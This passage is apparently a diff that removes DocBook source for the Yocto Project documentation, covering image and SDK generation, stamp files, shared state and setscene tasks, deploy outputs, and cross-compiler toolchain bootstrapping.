- in the same directory as the root filesystem image.
- This file lists out, line-by-line, the installed packages.
- The manifest file is useful for the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-testimage*'><filename>testimage</filename></ulink>
- class, for example, to determine whether or not to run
- specific tests.
- See the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_MANIFEST'><filename>IMAGE_MANIFEST</filename></ulink>
- variable for additional information.
- </para>
-
- <para>
- Optimizing processes that are run across the image include
- <filename>mklibs</filename>, <filename>prelink</filename>,
- and any other post-processing commands as defined by the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-ROOTFS_POSTPROCESS_COMMAND'><filename>ROOTFS_POSTPROCESS_COMMAND</filename></ulink>
- variable.
- The <filename>mklibs</filename> process optimizes the size
- of the libraries, while the <filename>prelink</filename>
- process optimizes the dynamic linking of shared libraries
- to reduce start up time of executables.
- </para>
-
- <para>
- After the root filesystem is built, processing begins on
- the image through the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-image'><filename>do_image</filename></ulink>
- task.
- The build system runs any pre-processing commands as
- defined by the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_PREPROCESS_COMMAND'><filename>IMAGE_PREPROCESS_COMMAND</filename></ulink>
- variable.
- This variable specifies a list of functions to call before
- the build system creates the final image output files.
- </para>
-
- <para>
- The build system dynamically creates
- <filename>do_image_*</filename> tasks as needed, based
- on the image types specified in the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></ulink>
- variable.
- The process turns everything into an image file or a set of
- image files and can compress the root filesystem image to
- reduce the overall size of the image.
- The formats used for the root filesystem depend on the
- <filename>IMAGE_FSTYPES</filename> variable.
- Compression depends on whether the formats support
- compression.
- </para>
-
- <para>
- As an example, a dynamically created task when creating a
- particular image <replaceable>type</replaceable> would
- take the following form:
- <literallayout class='monospaced'>
- do_image_<replaceable>type</replaceable>
- </literallayout>
- So, if the <replaceable>type</replaceable> as specified by
- the <filename>IMAGE_FSTYPES</filename> were
- <filename>ext4</filename>, the dynamically generated task
- would be as follows:
- <literallayout class='monospaced'>
- do_image_ext4
- </literallayout>
- </para>
-
- <para>
- The final task involved in image creation is the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-image-complete'><filename>do_image_complete</filename></ulink>
- task.
- This task completes the image by applying any image
- post processing as defined through the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_POSTPROCESS_COMMAND'><filename>IMAGE_POSTPROCESS_COMMAND</filename></ulink>
- variable.
- The variable specifies a list of functions to call once the
- build system has created the final image output files.
- <note>
- The entire image generation process is run under
- <link linkend='fakeroot-and-pseudo'>Pseudo</link>.
- Running under Pseudo ensures that the files in the
- root filesystem have correct ownership.
- </note>
- </para>
- </section>
-
- <section id='sdk-generation-dev-environment'>
- <title>SDK Generation</title>
-
- <para>
- The OpenEmbedded build system uses BitBake to generate the
- Software Development Kit (SDK) installer scripts for both
- the standard SDK and the extensible SDK (eSDK):
- </para>
-
- <para>
- <imagedata fileref="figures/sdk-generation.png" width="9in" align="center" />
- <note>
- For more information on the cross-development toolchain
- generation, see the
- "<link linkend='cross-development-toolchain-generation'>Cross-Development Toolchain Generation</link>"
- section.
- For information on advantages gained when building a
- cross-development toolchain using the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-populate_sdk'><filename>do_populate_sdk</filename></ulink>
- task, see the
- "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-building-an-sdk-installer'>Building an SDK Installer</ulink>"
- section in the Yocto Project Application Development
- and the Extensible Software Development Kit (eSDK)
- manual.
- </note>
- </para>
-
- <para>
- Like image generation, the SDK script process consists of
- several stages and depends on many variables.
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-populate_sdk'><filename>do_populate_sdk</filename></ulink>
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-populate_sdk_ext'><filename>do_populate_sdk_ext</filename></ulink>
- tasks use these key variables to help create the list of
- packages to actually install.
- For information on the variables listed in the figure,
- see the
- "<link linkend='sdk-dev-environment'>Application Development SDK</link>"
- section.
- </para>
-
- <para>
- The <filename>do_populate_sdk</filename> task helps create
- the standard SDK and handles two parts: a target part and a
- host part.
- The target part is the part built for the target hardware
- and includes libraries and headers.
- The host part is the part of the SDK that runs on the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDKMACHINE'><filename>SDKMACHINE</filename></ulink>.
- </para>
-
- <para>
- The <filename>do_populate_sdk_ext</filename> task helps
- create the extensible SDK and handles host and target parts
- differently than its counter part does for the standard SDK.
- For the extensible SDK, the task encapsulates the build
- system, which includes everything needed (host and target)
- for the SDK.
- </para>
-
- <para>
- Regardless of the type of SDK being constructed, the
- tasks perform some cleanup after which a cross-development
- environment setup script and any needed configuration files
- are created.
- The final output is the Cross-development
- toolchain installation script (<filename>.sh</filename>
- file), which includes the environment setup script.
- </para>
- </section>
-
- <section id='stamp-files-and-the-rerunning-of-tasks'>
- <title>Stamp Files and the Rerunning of Tasks</title>
-
- <para>
- For each task that completes successfully, BitBake writes a
- stamp file into the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-STAMPS_DIR'><filename>STAMPS_DIR</filename></ulink>
- directory.
- The beginning of the stamp file's filename is determined
- by the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-STAMP'><filename>STAMP</filename></ulink>
- variable, and the end of the name consists of the task's
- name and current
- <link linkend='overview-checksums'>input checksum</link>.
- <note>
- This naming scheme assumes that
- <ulink url='&YOCTO_DOCS_BB_URL;#var-BB_SIGNATURE_HANDLER'><filename>BB_SIGNATURE_HANDLER</filename></ulink>
- is "OEBasicHash", which is almost always the case in
- current OpenEmbedded.
- </note>
- To determine if a task needs to be rerun, BitBake checks
- if a stamp file with a matching input checksum exists
- for the task.
- If such a stamp file exists, the task's output is
- assumed to exist and still be valid.
- If the file does not exist, the task is rerun.
- <note>
- <para>The stamp mechanism is more general than the
- shared state (sstate) cache mechanism described in the
- "<link linkend='setscene-tasks-and-shared-state'>Setscene Tasks and Shared State</link>"
- section.
- BitBake avoids rerunning any task that has a valid
- stamp file, not just tasks that can be accelerated
- through the sstate cache.</para>
-
- <para>However, you should realize that stamp files only
- serve as a marker that some work has been done and that
- these files do not record task output.
- The actual task output would usually be somewhere in
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TMPDIR'><filename>TMPDIR</filename></ulink>
- (e.g. in some recipe's
- <ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink>.)
- What the sstate cache mechanism adds is a way to cache
- task output that can then be shared between build
- machines.</para>
- </note>
- Since <filename>STAMPS_DIR</filename> is usually a
- subdirectory of <filename>TMPDIR</filename>, removing
- <filename>TMPDIR</filename> will also remove
- <filename>STAMPS_DIR</filename>, which means tasks will
- properly be rerun to repopulate
- <filename>TMPDIR</filename>.
- </para>
-
- <para>
- If you want some task to always be considered "out of
- date", you can mark it with the
- <ulink url='&YOCTO_DOCS_BB_URL;#variable-flags'><filename>nostamp</filename></ulink>
- varflag.
- If some other task depends on such a task, then that
- task will also always be considered out of date, which
- might not be what you want.
- </para>
-
- <para>
- For details on how to view information about a task's
- signature, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-viewing-task-variable-dependencies'>Viewing Task Variable Dependencies</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </section>
-
- <section id='setscene-tasks-and-shared-state'>
- <title>Setscene Tasks and Shared State</title>
-
- <para>
- The description of tasks so far assumes that BitBake needs
- to build everything and no available prebuilt objects
- exist.
- BitBake does support skipping tasks if prebuilt objects are
- available.
- These objects are usually made available in the form of a
- shared state (sstate) cache.
- <note>
- For information on variables affecting sstate, see the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SSTATE_DIR'><filename>SSTATE_DIR</filename></ulink>
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SSTATE_MIRRORS'><filename>SSTATE_MIRRORS</filename></ulink>
- variables.
- </note>
- </para>
-
- <para>
- The idea of a setscene task (i.e
- <filename>do_</filename><replaceable>taskname</replaceable><filename>_setscene</filename>)
- is a version of the task where
- instead of building something, BitBake can skip to the end
- result and simply place a set of files into specific
- locations as needed.
- In some cases, it makes sense to have a setscene task
- variant (e.g. generating package files in the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package_write_deb'><filename>do_package_write_*</filename></ulink>
- task).
- In other cases, it does not make sense (e.g. a
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-patch'><filename>do_patch</filename></ulink>
- task or a
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-unpack'><filename>do_unpack</filename></ulink>
- task) since the work involved would be equal to or greater
- than the underlying task.
- </para>
-
- <para>
- In the build system, the common tasks that have setscene
- variants are
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package'><filename>do_package</filename></ulink>,
- <filename>do_package_write_*</filename>,
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-deploy'><filename>do_deploy</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-packagedata'><filename>do_packagedata</filename></ulink>,
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></ulink>.
- Notice that these tasks represent most of the tasks whose
- output is an end result.
- </para>
-
- <para>
- The build system has knowledge of the relationship between
- these tasks and other preceding tasks.
- For example, if BitBake runs
- <filename>do_populate_sysroot_setscene</filename> for
- something, it does not make sense to run any of the
- <filename>do_fetch</filename>,
- <filename>do_unpack</filename>,
- <filename>do_patch</filename>,
- <filename>do_configure</filename>,
- <filename>do_compile</filename>, and
- <filename>do_install</filename> tasks.
- However, if <filename>do_package</filename> needs to be
- run, BitBake needs to run those other tasks.
- </para>
-
- <para>
- It becomes more complicated if everything can come
- from an sstate cache because some objects are simply
- not required at all.
- For example, you do not need a compiler or native tools,
- such as quilt, if nothing exists to compile or patch.
- If the <filename>do_package_write_*</filename> packages
- are available from sstate, BitBake does not need the
- <filename>do_package</filename> task data.
- </para>
-
- <para>
- To handle all these complexities, BitBake runs in two
- phases.
- The first is the "setscene" stage.
- During this stage, BitBake first checks the sstate cache
- for any targets it is planning to build.
- BitBake does a fast check to see if the object exists
- rather than a complete download.
- If nothing exists, the second phase, which is the setscene
- stage, completes and the main build proceeds.
- </para>
-
- <para>
- If objects are found in the sstate cache, the build system
- works backwards from the end targets specified by the user.
- For example, if an image is being built, the build system
- first looks for the packages needed for that image and the
- tools needed to construct an image.
- If those are available, the compiler is not needed.
- Thus, the compiler is not even downloaded.
- If something was found to be unavailable, or the
- download or setscene task fails, the build system then
- tries to install dependencies, such as the compiler, from
- the cache.
- </para>
-
- <para>
- The availability of objects in the sstate cache is
- handled by the function specified by the
- <ulink url='&YOCTO_DOCS_BB_URL;#var-BB_HASHCHECK_FUNCTION'><filename>BB_HASHCHECK_FUNCTION</filename></ulink>
- variable and returns a list of available objects.
- The function specified by the
- <ulink url='&YOCTO_DOCS_BB_URL;#var-BB_SETSCENE_DEPVALID'><filename>BB_SETSCENE_DEPVALID</filename></ulink>
- variable is the function that determines whether a given
- dependency needs to be followed, and whether for any given
- relationship the function needs to be passed.
- The function returns a True or False value.
- </para>
- </section>
- </section>
-
- <section id='images-dev-environment'>
- <title>Images</title>
-
- <para>
- The images produced by the build system are compressed forms
- of the root filesystem and are ready to boot on a target
- device.
- You can see from the
- <link linkend='general-workflow-figure'>general workflow figure</link>
- that BitBake output, in part, consists of images.
- This section takes a closer look at this output:
- <imagedata fileref="figures/images.png" align="center" width="5.5in" depth="5.5in" />
- </para>
-
- <note>
- For a list of example images that the Yocto Project provides,
- see the
- "<ulink url='&YOCTO_DOCS_REF_URL;#ref-images'>Images</ulink>"
- chapter in the Yocto Project Reference Manual.
- </note>
-
- <para>
- The build process writes images out to the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
- inside the
- <filename>tmp/deploy/images/<replaceable>machine</replaceable>/</filename>
- folder as shown in the figure.
- This folder contains any files expected to be loaded on the
- target device.
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPLOY_DIR'><filename>DEPLOY_DIR</filename></ulink>
- variable points to the <filename>deploy</filename> directory,
- while the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPLOY_DIR_IMAGE'><filename>DEPLOY_DIR_IMAGE</filename></ulink>
- variable points to the appropriate directory containing images
- for the current configuration.
- <itemizedlist>
- <listitem><para>
- <replaceable>kernel-image</replaceable>:
- A kernel binary file.
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#var-KERNEL_IMAGETYPE'><filename>KERNEL_IMAGETYPE</filename></ulink>
- variable determines the naming scheme for the
- kernel image file.
- Depending on this variable, the file could begin with
- a variety of naming strings.
- The
- <filename>deploy/images/</filename><replaceable>machine</replaceable>
- directory can contain multiple image files for the
- machine.
- </para></listitem>
- <listitem><para>
- <replaceable>root-filesystem-image</replaceable>:
- Root filesystems for the target device (e.g.
- <filename>*.ext3</filename> or
- <filename>*.bz2</filename> files).
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></ulink>
- variable determines the root filesystem image type.
- The
- <filename>deploy/images/</filename><replaceable>machine</replaceable>
- directory can contain multiple root filesystems for the
- machine.
- </para></listitem>
- <listitem><para>
- <replaceable>kernel-modules</replaceable>:
- Tarballs that contain all the modules built for the
- kernel.
- Kernel module tarballs exist for legacy purposes and
- can be suppressed by setting the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MODULE_TARBALL_DEPLOY'><filename>MODULE_TARBALL_DEPLOY</filename></ulink>
- variable to "0".
- The
- <filename>deploy/images/</filename><replaceable>machine</replaceable>
- directory can contain multiple kernel module tarballs
- for the machine.
- </para></listitem>
- <listitem><para>
- <replaceable>bootloaders</replaceable>:
- If applicable to the target machine, bootloaders
- supporting the image.
- The <filename>deploy/images/</filename><replaceable>machine</replaceable>
- directory can contain multiple bootloaders for the
- machine.
- </para></listitem>
- <listitem><para>
- <replaceable>symlinks</replaceable>:
- The
- <filename>deploy/images/</filename><replaceable>machine</replaceable>
- folder contains a symbolic link that points to the
- most recently built file for each machine.
- These links might be useful for external scripts that
- need to obtain the latest version of each file.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='sdk-dev-environment'>
- <title>Application Development SDK</title>
-
- <para>
- In the
- <link linkend='general-workflow-figure'>general workflow figure</link>,
- the output labeled "Application Development SDK" represents an
- SDK.
- The SDK generation process differs depending on whether you
- build an extensible SDK (e.g.
- <filename>bitbake -c populate_sdk_ext</filename> <replaceable>imagename</replaceable>)
- or a standard SDK (e.g.
- <filename>bitbake -c populate_sdk</filename> <replaceable>imagename</replaceable>).
- This section takes a closer look at this output:
- <imagedata fileref="figures/sdk.png" align="center" width="9in" depth="7.25in" />
- </para>
-
- <para>
- The specific form of this output is a set of files that
- includes a self-extracting SDK installer
- (<filename>*.sh</filename>), host and target manifest files,
- and files used for SDK testing.
- When the SDK installer file is run, it installs the SDK.
- The SDK consists of a cross-development toolchain, a set of
- libraries and headers, and an SDK environment setup script.
- Running this installer essentially sets up your
- cross-development environment.
- You can think of the cross-toolchain as the "host"
- part because it runs on the SDK machine.
- You can think of the libraries and headers as the "target"
- part because they are built for the target hardware.
- The environment setup script is added so that you can
- initialize the environment before using the tools.
- </para>
-
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- The Yocto Project supports several methods by which
- you can set up this cross-development environment.
- These methods include downloading pre-built SDK
- installers or building and installing your own SDK
- installer.
- </para></listitem>
- <listitem><para>
- For background information on cross-development
- toolchains in the Yocto Project development
- environment, see the
- "<link linkend='cross-development-toolchain-generation'>Cross-Development Toolchain Generation</link>"
- section.
- </para></listitem>
- <listitem><para>
- For information on setting up a cross-development
- environment, see the
- <ulink url='&YOCTO_DOCS_SDK_URL;'>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</ulink>
- manual.
- </para></listitem>
- </itemizedlist>
- </note>
-
- <para>
- All the output files for an SDK are written to the
- <filename>deploy/sdk</filename> folder inside the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
- as shown in the previous figure.
- Depending on the type of SDK, several variables exist that help
- configure these files.
- The following list shows the variables associated with an
- extensible SDK:
- <itemizedlist>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPLOY_DIR'><filename>DEPLOY_DIR</filename></ulink>:
- Points to the <filename>deploy</filename> directory.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_EXT_TYPE'><filename>SDK_EXT_TYPE</filename></ulink>:
- Controls whether or not shared state artifacts are
- copied into the extensible SDK.
- By default, all required shared state artifacts are
- copied into the SDK.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_INCLUDE_PKGDATA'><filename>SDK_INCLUDE_PKGDATA</filename></ulink>:
- Specifies whether or not packagedata is included in the
- extensible SDK for all recipes in the "world" target.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_INCLUDE_TOOLCHAIN'><filename>SDK_INCLUDE_TOOLCHAIN</filename></ulink>:
- Specifies whether or not the toolchain is included
- when building the extensible SDK.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_LOCAL_CONF_WHITELIST'><filename>SDK_LOCAL_CONF_WHITELIST</filename></ulink>:
- A list of variables allowed through from the build
- system configuration into the extensible SDK
- configuration.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_LOCAL_CONF_BLACKLIST'><filename>SDK_LOCAL_CONF_BLACKLIST</filename></ulink>:
- A list of variables not allowed through from the build
- system configuration into the extensible SDK
- configuration.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_INHERIT_BLACKLIST'><filename>SDK_INHERIT_BLACKLIST</filename></ulink>:
- A list of classes to remove from the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-INHERIT'><filename>INHERIT</filename></ulink>
- value globally within the extensible SDK configuration.
- </para></listitem>
- </itemizedlist>
- This next list, shows the variables associated with a standard
- SDK:
- <itemizedlist>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPLOY_DIR'><filename>DEPLOY_DIR</filename></ulink>:
- Points to the <filename>deploy</filename> directory.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDKMACHINE'><filename>SDKMACHINE</filename></ulink>:
- Specifies the architecture of the machine on which the
- cross-development tools are run to create packages for
- the target hardware.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDKIMAGE_FEATURES'><filename>SDKIMAGE_FEATURES</filename></ulink>:
- Lists the features to include in the "target" part
- of the SDK.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TOOLCHAIN_HOST_TASK'><filename>TOOLCHAIN_HOST_TASK</filename></ulink>:
- Lists packages that make up the host part of the SDK
- (i.e. the part that runs on the
- <filename>SDKMACHINE</filename>).
- When you use
- <filename>bitbake -c populate_sdk <replaceable>imagename</replaceable></filename>
- to create the SDK, a set of default packages apply.
- This variable allows you to add more packages.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TOOLCHAIN_TARGET_TASK'><filename>TOOLCHAIN_TARGET_TASK</filename></ulink>:
- Lists packages that make up the target part of the SDK
- (i.e. the part built for the target hardware).
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDKPATH'><filename>SDKPATH</filename></ulink>:
- Defines the default SDK installation path offered by
- the installation script.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_HOST_MANIFEST'><filename>SDK_HOST_MANIFEST</filename></ulink>:
- Lists all the installed packages that make up the host
- part of the SDK.
- This variable also plays a minor role for extensible
- SDK development as well.
- However, it is mainly used for the standard SDK.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_TARGET_MANIFEST'><filename>SDK_TARGET_MANIFEST</filename></ulink>:
- Lists all the installed packages that make up the
- target part of the SDK.
- This variable also plays a minor role for extensible
- SDK development as well.
- However, it is mainly used for the standard SDK.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
- </section>
-
- <section id="cross-development-toolchain-generation">
- <title>Cross-Development Toolchain Generation</title>
-
- <para>
- The Yocto Project does most of the work for you when it comes to
- creating
- <ulink url='&YOCTO_DOCS_REF_URL;#cross-development-toolchain'>cross-development toolchains</ulink>.
- This section provides some technical background on how
- cross-development toolchains are created and used.
- For more information on toolchains, you can also see the
- <ulink url='&YOCTO_DOCS_SDK_URL;'>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</ulink>
- manual.
- </para>
-
- <para>
- In the Yocto Project development environment, cross-development
- toolchains are used to build images and applications that run
- on the target hardware.
- With just a few commands, the OpenEmbedded build system creates
- these necessary toolchains for you.
- </para>
-
- <para>
- The following figure shows a high-level build environment regarding
- toolchain construction and use.
- </para>
-
- <para>
- <imagedata fileref="figures/cross-development-toolchains.png" width="8in" depth="6in" align="center" />
- </para>
-
- <para>
- Most of the work occurs on the Build Host.
- This is the machine used to build images and generally work within
- the the Yocto Project environment.
- When you run
- <ulink url='&YOCTO_DOCS_REF_URL;#bitbake-term'>BitBake</ulink>
- to create an image, the OpenEmbedded build system
- uses the host <filename>gcc</filename> compiler to bootstrap a
- cross-compiler named <filename>gcc-cross</filename>.
- The <filename>gcc-cross</filename> compiler is what BitBake uses to
- compile source files when creating the target image.
- You can think of <filename>gcc-cross</filename> simply as an
- automatically generated cross-compiler that is used internally
- within BitBake only.
- <note>
- The extensible SDK does not use
- <filename>gcc-cross-canadian</filename> since this SDK
- ships a copy of the OpenEmbedded build system and the sysroot
- within it contains <filename>gcc-cross</filename>.
- </note>
- </para>
-
- <para>
- The chain of events that occurs when <filename>gcc-cross</filename> is
- bootstrapped is as follows:
- <literallayout class='monospaced'>
- gcc -> binutils-cross -> gcc-cross-initial -> linux-libc-headers -> glibc-initial -> glibc -> gcc-cross -> gcc-runtime
- </literallayout>
- <itemizedlist>
- <listitem><para>
- <filename>gcc</filename>:
- The build host's GNU Compiler Collection (GCC).
- </para></listitem>
- <listitem><para>
- <filename>binutils-cross</filename>:
- The bare minimum binary utilities needed in order to run
- the <filename>gcc-cross-initial</filename> phase of the
- bootstrap operation.
- </para></listitem>
- <listitem><para>
- <filename>gcc-cross-initial</filename>:
- An early stage of the bootstrap process for creating
- the cross-compiler.
- This stage builds enough of the <filename>gcc-cross</filename>,
- the C library, and other pieces needed to finish building the
- final cross-compiler in later stages.
- This tool is a "native" package (i.e. it is designed to run on
- the build host).
- </para></listitem>
- <listitem><para>
- <filename>linux-libc-headers</filename>:
- Headers needed for the cross-compiler.
- </para></listitem>
- <listitem><para>
- <filename>glibc-initial</filename>:
- An initial version of the Embedded GNU C Library
- (GLIBC) needed to bootstrap <filename>glibc</filename>.
- </para></listitem>
- <listitem><para>
- <filename>glibc</filename>:
- The GNU C Library.
- </para></listitem>
- <listitem><para>
- <filename>gcc-cross</filename>:
- The final stage of the bootstrap process for the
- cross-compiler.
- This stage results in the actual cross-compiler that
- BitBake uses when it builds an image for a targeted
- device.
- <note>
- If you are replacing this cross compiler toolchain
- with a custom version, you must replace
- <filename>gcc-cross</filename>.
- </note>
- This tool is also a "native" package (i.e. it is
- designed to run on the build host).
- </para></listitem>
- <listitem><para>
- <filename>gcc-runtime</filename>:
- Runtime libraries resulting from the toolchain bootstrapping
- process.
- This tool produces a binary that consists of the
- runtime libraries need for the targeted device.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- You can use the OpenEmbedded build system to build an installer for
- the relocatable SDK used to develop applications.
- When you run the installer, it installs the toolchain, which
- contains the development tools (e.g.,
- <filename>gcc-cross-canadian</filename>,
- <filename>binutils-cross-canadian</filename>, and other
- <filename>nativesdk-*</filename> tools),
- which are tools native to the SDK (i.e. native to
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_ARCH'><filename>SDK_ARCH</filename></ulink>),
- you need to cross-compile and test your software.
- The figure shows the commands you use to easily build out this
- toolchain.
- This cross-development toolchain is built to execute on the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDKMACHINE'><filename>SDKMACHINE</filename></ulink>,
- which might or might not be the same
- machine as the Build Host.
- <note>
- If your target architecture is supported by the Yocto Project,
- you can take advantage of pre-built images that ship with the
- Yocto Project and already contain cross-development toolchain
- installers.
- </note>
- </para>
-
- <para>
- Here is the bootstrap process for the relocatable toolchain:
- <literallayout class='monospaced'>
- gcc -> binutils-crosssdk -> gcc-crosssdk-initial -> linux-libc-headers ->
- glibc-initial -> nativesdk-glibc -> gcc-crosssdk -> gcc-cross-canadian
- </literallayout>
- <itemizedlist>
- <listitem><para>
- <filename>gcc</filename>:
- The build host's GNU Compiler Collection (GCC).
- </para></listitem>
- <listitem><para>
- <filename>binutils-crosssdk</filename>:
- The bare minimum binary utilities needed in order to run
- the <filename>gcc-crosssdk-initial</filename> phase of the
- bootstrap operation.
- </para></listitem>
- <listitem><para>
- <filename>gcc-crosssdk-initial</filename>:
- An early stage of the bootstrap process for creating
- the cross-compiler.
- This stage builds enough of the
- <filename>gcc-crosssdk</filename> and supporting pieces so that
- the final stage of the bootstrap process can produce the
- finished cross-compiler.
- This tool is a "native" binary that runs on the build host.
- </para></listitem>
- <listitem><para>
- <filename>linux-libc-headers</filename>:
- Headers needed for the cross-compiler.
- </para></listitem>
- <listitem><para>
- <filename>glibc-initial</filename>:
- An initial version of the Embedded GLIBC needed to bootstrap
- <filename>nativesdk-glibc</filename>.
- </para></listitem>
- <listitem><para>
- <filename>nativesdk-glibc</filename>:
- The Embedded GLIBC needed to bootstrap the
- <filename>gcc-crosssdk</filename>.
- </para></listitem>
- <listitem><para>
- <filename>gcc-crosssdk</filename>:
- The final stage of the bootstrap process for the
- relocatable cross-compiler.
- The <filename>gcc-crosssdk</filename> is a transitory
- compiler and never leaves the build host.
- Its purpose is to help in the bootstrap process to create
- the eventual <filename>gcc-cross-canadian</filename>
- compiler, which is relocatable.
- This tool is also a "native" package (i.e. it is
- designed to run on the build host).
- </para></listitem>
- <listitem><para>
- <filename>gcc-cross-canadian</filename>:
- The final relocatable cross-compiler.
- When run on the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDKMACHINE'><filename>SDKMACHINE</filename></ulink>,
- this tool
- produces executable code that runs on the target device.
- Only one cross-canadian compiler is produced per architecture
- since they can be targeted at different processor optimizations
- using configurations passed to the compiler through the
- compile commands.
- This circumvents the need for multiple compilers and thus
- reduces the size of the toolchains.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <note>
- For information on advantages gained when building a
- cross-development toolchain installer, see the
- "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-building-an-sdk-installer'>Building an SDK Installer</ulink>"
- appendix in the Yocto Project Application Development and the
- Extensible Software Development Kit (eSDK) manual.
- </note>
- </section>
-
- <section id="shared-state-cache">
- <title>Shared State Cache</title>
-
- <para>
- By design, the OpenEmbedded build system builds everything from
- scratch unless
- <ulink url='&YOCTO_DOCS_REF_URL;#bitbake-term'>BitBake</ulink>
- can determine that parts do not need to be rebuilt.
- Fundamentally, building from scratch is attractive as it means all
- parts are built fresh and no possibility of stale data exists that
- can cause problems.
- When developers hit problems, they typically default back to
- building from scratch so they have a know state from the
- start.
- </para>
-
- <para>
- Building an image from scratch is both an advantage and a
- disadvantage to the process.
- As mentioned in the previous paragraph, building from scratch
- ensures that everything is current and starts from a known state.
- However, building from scratch also takes much longer as it
- generally means rebuilding things that do not necessarily need
- to be rebuilt.
- </para>
-
- <para>
- The Yocto Project implements shared state code that supports
- incremental builds.
- The implementation of the shared state code answers the following
- questions that were fundamental roadblocks within the OpenEmbedded
- incremental build support system:
- <itemizedlist>
- <listitem><para>
- What pieces of the system have changed and what pieces have
- not changed?
- </para></listitem>
- <listitem><para>
- How are changed pieces of software removed and replaced?
- </para></listitem>
- <listitem><para>
- How are pre-built components that do not need to be rebuilt
- from scratch used when they are available?
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- For the first question, the build system detects changes in the
- "inputs" to a given task by creating a checksum (or signature) of
- the task's inputs.
- If the checksum changes, the system assumes the inputs have changed
- and the task needs to be rerun.
- For the second question, the shared state (sstate) code tracks
- which tasks add which output to the build process.
- This means the output from a given task can be removed, upgraded
- or otherwise manipulated.
- The third question is partly addressed by the solution for the
- second question assuming the build system can fetch the sstate
- objects from remote locations and install them if they are deemed
- to be valid.
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- The build system does not maintain
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PR'><filename>PR</filename></ulink>
- information as part of the shared state packages.
- Consequently, considerations exist that affect
- maintaining shared state feeds.
- For information on how the build system works with
- packages and can track incrementing
- <filename>PR</filename> information, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#automatically-incrementing-a-binary-package-revision-number'>Automatically Incrementing a Binary Package Revision Number</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para></listitem>
- <listitem><para>
- The code in the build system that supports incremental
- builds is not simple code.
- For techniques that help you work around issues related
- to shared state code, see the
